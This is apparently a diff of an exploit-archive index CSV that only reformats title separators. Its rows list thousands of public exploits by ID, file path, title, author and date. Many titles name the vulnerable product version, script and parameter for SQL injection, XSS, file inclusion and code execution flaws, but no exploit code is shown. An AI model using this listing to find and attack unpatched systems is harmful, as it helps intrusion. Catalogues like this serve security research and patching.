2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0 -30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 Admin/Index.php Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 +30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - Admin/Index.php Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0 30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 - Index.php Local File Inclusion",2007-11-03,joseph.giron13,php,webapps,0 30736,platforms/linux/remote/30736.txt,"GNU Emacs 22.1 - Local Variable Handling Code Execution",2007-11-02,"Drake Wilson",linux,remote,0 30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion",2007-11-05,"arfis project",php,webapps,0 @@ -27700,7 +27700,7 @@ id,file,description,date,author,platform,type,port 30752,platforms/php/webapps/30752.txt,"Eggblog 3.1 Rss.php Cross-Site Scripting",2007-11-12,"Mesut Timur",php,webapps,0 30753,platforms/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - Index.php Denial of Service",2007-11-12,L4teral,php,dos,0 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 PHP_SELF Index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0 -30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN Download_Plugin.php3 - Cross-Site Scripting",2007-11-12,"Jan Fry",hardware,remote,0 +30755,platforms/hardware/remote/30755.txt,"F5 FirePass 4100 SSL VPN - Download_Plugin.php3 Cross-Site Scripting",2007-11-12,"Jan Fry",hardware,remote,0 30756,platforms/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities",2007-11-12,"Elazar Broad",windows,dos,0 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 sources/frame.php room Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 upgradev1.php INSTALL_X7CHATVERSION Parameter XSS",2007-11-12,ShAy6oOoN,php,webapps,0 @@ -27752,28 +27752,28 @@ id,file,description,date,author,platform,type,port 30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 /myalbum/ratephoto.php lid Parameter SQL Injection",2007-11-28,Lostmon,php,webapps,0 30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 modules/mylinks/ratelink.php lid Parameter SQL Injection",2007-11-28,Lostmon,php,webapps,0 30825,platforms/windows/dos/30825.html,"Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow",2006-10-09,"Joxean Koret",windows,dos,0 -30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 upload/xax/admin/modules/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 upload/xax/admin/modules/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 upload/xax/admin/patch/index.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 -30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/patch/index.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 +30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0 30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service",2007-11-29,"Elazar Broad",windows,dos,0 -30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.php3 - Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0 -30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.php3 - Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote,0 +30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN - My.Logon.php3 Cross-Site Scripting",2007-11-30,"Richard Brain",hardware,remote,0 +30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN - Download_Plugin.php3 Cross-Site Scripting",2007-11-10,"Adrian Pastor",hardware,remote,0 30835,platforms/unix/remote/30835.sh,"Apache HTTP Server 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.php SQL Injection",2007-11-30,Lostmon,php,webapps,0 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service",2007-11-30,TeLeMan,linux,dos,0 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x_Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering",2007-12-01,"Carl Hardwick",multiple,remote,0 30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - daemon_start Local Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0 30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 - Remote Format String",2007-12-04,"SEC Consult",windows,dos,0 -30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 pages/default.aspx template Variable Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 +30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - pages/default.aspx template Variable Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 30842,platforms/asp/webapps/30842.txt,"Absolute News Manager .NET 5.1 - xlaabsolutenm.aspx Multiple Parameter SQL Injection",2007-12-04,"Adrian Pastor",asp,webapps,0 -30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 xlaabsolutenm.aspx rmore Parameter XSS",2007-12-04,"Adrian Pastor",asp,webapps,0 -30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 pages/default.aspx template Parameter XSS",2007-12-04,"Adrian Pastor",asp,webapps,0 -30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 getpath.aspx Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0 +30843,platforms/asp/webapps/30843.txt,"Absolute News Manager .NET 5.1 - xlaabsolutenm.aspx rmore Parameter XSS",2007-12-04,"Adrian Pastor",asp,webapps,0 +30844,platforms/asp/webapps/30844.txt,"Absolute News Manager .NET 5.1 - pages/default.aspx template Parameter XSS",2007-12-04,"Adrian Pastor",asp,webapps,0 +30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - getpath.aspx Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0 30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 chat/deluser.php3 LIMIT Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 -30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 - Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 +30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0 30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content - index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component - index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0 30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload",2007-12-05,"Luigi Auriemma",multiple,remote,0 @@ -27845,14 +27845,14 @@ id,file,description,date,author,platform,type,port 30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 - 'com_option' Parameter Cross-Site Scripting",2007-12-25,"Omer Singer",php,webapps,0 30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 - 'default.asp' Multiple SQL Injection",2007-12-24,bypass,asp,webapps,0 -30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 Error Message Remote Script Execution",2007-12-26,anonymous,windows,remote,0 +30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,windows,remote,0 30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0 30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0 30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow and Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' Cross-Site Scripting",2007-12-28,"Juan Galiana Lara",php,webapps,0 -30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 +30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 - (managetimetracker.php id param) SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus - 'faq.php' SQL Injection",2007-12-28,"Juan Galiana Lara",php,webapps,0 30948,platforms/php/webapps/30948.txt,"OpenBiblio 0.x - staff_del_confirm.php Multiple Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0 30949,platforms/php/webapps/30949.txt,"OpenBiblio 0.x - theme_del_confirm.php name Parameter XSS",2007-12-28,"Juan Galiana Lara",php,webapps,0 @@ -27888,10 +27888,10 @@ id,file,description,date,author,platform,type,port 30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 - 'html.php' Remote Code Execution",2008-01-07,"Eugene Minaev",php,webapps,0 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 -30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 admin.php CSRF",2008-01-07,L4teral,php,webapps,0 +30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 - admin.php CSRF",2008-01-07,L4teral,php,webapps,0 30995,platforms/php/webapps/30995.txt,"eTicket 1.5.5.2 view.php s Parameter XSS",2008-01-07,L4teral,php,webapps,0 30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 - search.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 -30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 admin.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 +30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 - admin.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 30998,platforms/linux/remote/30998.py,"SynCE 0.92 - 'vdccm' Daemon Remote Command Injection",2008-01-07,"Alfredo Ortega",linux,remote,0 30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta ",windows,local,0 31000,platforms/php/webapps/31000.txt,"SysHotel On Line System - 'index.php' Local File Inclusion",2008-01-08,p4imi0,php,webapps,0 @@ -27906,7 +27906,7 @@ id,file,description,date,author,platform,type,port 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,php,webapps,0 31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,php,webapps,0 -31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross-Site Scripting",2008-01-31,"Tomasz Kuczynski",php,webapps,0 +31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 - User-Agent HTTP Header Cross-Site Scripting",2008-01-31,"Tomasz Kuczynski",php,webapps,0 31013,platforms/hardware/remote/31013.txt,"2Wire Routers - Cross-Site Request Forgery",2008-01-15,hkm,hardware,remote,0 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80 @@ -27916,7 +27916,7 @@ id,file,description,date,author,platform,type,port 31021,platforms/osx/dos/31021.html,"Apple Safari 2.0.4 KHTML WebKit Remote Denial of Service",2008-01-12,"David Barroso",osx,dos,0 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",php,webapps,0 31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 - 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow",2008-01-11,anonymous,windows,remote,0 -31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass",2008-01-16,nnposter,hardware,remote,0 +31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 - URI Security Bypass",2008-01-16,nnposter,hardware,remote,0 31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",windows,remote,0 31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80 31034,platforms/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injection",2008-01-16,waraxe,php,webapps,0 @@ -27939,8 +27939,8 @@ id,file,description,date,author,platform,type,port 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0 31052,platforms/linux/remote/31052.java,"Apache 2.2.6 - 'mod_negotiation' HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 31053,platforms/php/remote/31053.php,"PHP 5.2.5 cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 -31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",linux,dos,0 -31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure",2008-01-23,"AmnPardaz ",asp,webapps,0 +31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 - Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",linux,dos,0 +31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,"AmnPardaz ",asp,webapps,0 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,osx,dos,0 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0 @@ -27989,7 +27989,7 @@ id,file,description,date,author,platform,type,port 31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk operator/article/article_attachment.asp Attach_Id Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 DELE Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 31106,platforms/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities",2008-02-04,"Luigi Auriemma",multiple,remote,0 -31107,platforms/php/webapps/31107.txt,"Portail Web Php 2.5.1 config/conf-activation.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 +31107,platforms/php/webapps/31107.txt,"Portail Web Php 2.5.1 - config/conf-activation.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31108,platforms/php/webapps/31108.txt,"Portail Web Php 2.5.1 menu/item.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31109,platforms/php/webapps/31109.txt,"Portail Web Php 2.5.1 modules/conf_modules.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31110,platforms/php/webapps/31110.txt,"Portail Web Php 2.5.1 system/login.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 @@ -28010,7 +28010,7 @@ id,file,description,date,author,platform,type,port 31125,platforms/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,php,webapps,0 31126,platforms/php/webapps/31126.txt,"Serendipity Freetag-plugin 2.95 - 'style' parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 31127,platforms/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote,0 -31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 +31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps,0 31130,platforms/multiple/remote/31130.txt,"Apache Tomcat 6.0.15 Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",multiple,remote,0 31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - 'index.php' SQL Injection / Cross-Site Scripting",2008-02-09,Houssamix,php,webapps,0 @@ -28059,7 +28059,7 @@ id,file,description,date,author,platform,type,port 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution Exploit",2014-02-16,Rew,hardware,remote,0 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS",2014-01-24,"High-Tech Bridge SA",php,webapps,80 -31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 (index.php id param) - SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 +31175,platforms/php/webapps/31175.txt,"Joomla JV Comment Extension 3.0.2 - (index.php id param) SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31177,platforms/windows/dos/31177.html,"MW6 Technologies DataMatrix - ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data param) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 @@ -28163,7 +28163,7 @@ id,file,description,date,author,platform,type,port 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0 31264,platforms/php/remote/31264.rb,"Simple E-Document Arbitrary File Upload",2014-01-29,Metasploit,php,remote,80 -31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 +31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 31278,platforms/php/webapps/31278.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 GradebookStuScores.asp GrdBk Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 @@ -28275,7 +28275,7 @@ id,file,description,date,author,platform,type,port 31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x - mod_userdir Information Disclosure",2008-03-12,julien.cayzac,linux,remote,0 31696,platforms/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos,0 31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",php,webapps,0 -31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN 'installControl.php3' - Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 +31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection",2008-04-23,"Richard Brain",windows,remote,0 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos,0 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos,0 @@ -28580,13 +28580,13 @@ id,file,description,date,author,platform,type,port 31727,platforms/php/webapps/31727.txt,"ChiCoMaS 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0 31728,platforms/multiple/dos/31728.txt,"Call of Duty 4 1.5 - Malformed 'stats' command Denial of Service",2008-05-02,"Luigi Auriemma",multiple,dos,0 31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.0.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0 -31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL php/prenom.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 -31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche - Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 -31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 +31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - php/prenom.php Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 +31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - php/index.php nom_branche Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 +31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL - php/info.php Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80 +31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - (index.php cID param) SQL Injection",2014-02-18,killall-9,php,webapps,80 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution",2014-02-18,Metasploit,windows,remote,0 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address param) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 @@ -28618,7 +28618,7 @@ id,file,description,date,author,platform,type,port 31764,platforms/hardware/webapps/31764.txt,"Dlink DIR-615 Hardware vE4 Firmware v5.10 - CSRF",2014-02-19,"Dhruv Shah",hardware,webapps,80 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent XSS",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 31766,platforms/windows/local/31766.rb,"Audiotran - (.PLS) Stack Buffer Overflow",2014-02-19,Metasploit,windows,local,0 -31767,platforms/multiple/remote/31767.rb,"MediaWiki Thumb.php - Remote Command Execution",2014-02-19,Metasploit,multiple,remote,80 +31767,platforms/multiple/remote/31767.rb,"MediaWiki - Thumb.php Remote Command Execution",2014-02-19,Metasploit,multiple,remote,80 31768,platforms/php/webapps/31768.txt,"WordPress BP Group Documents Plugin 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 31769,platforms/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution",2008-05-08,anonymous,windows,remote,0 31770,platforms/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",multiple,remote,0 @@ -28687,7 +28687,7 @@ id,file,description,date,author,platform,type,port 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 31834,platforms/php/webapps/31834.txt,"WordPress AdRotate Plugin 3.9.4 - (clicktracker.php track param) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 -31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin 'wp-uploadfile.php' - SQL Injection",2008-05-24,eserg.ru,php,webapps,0 +31836,platforms/php/webapps/31836.txt,"WordPress Upload File Plugin - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 31838,platforms/php/webapps/31838.txt,"Horde Multiple Product - workweek.php timestamp Parameter 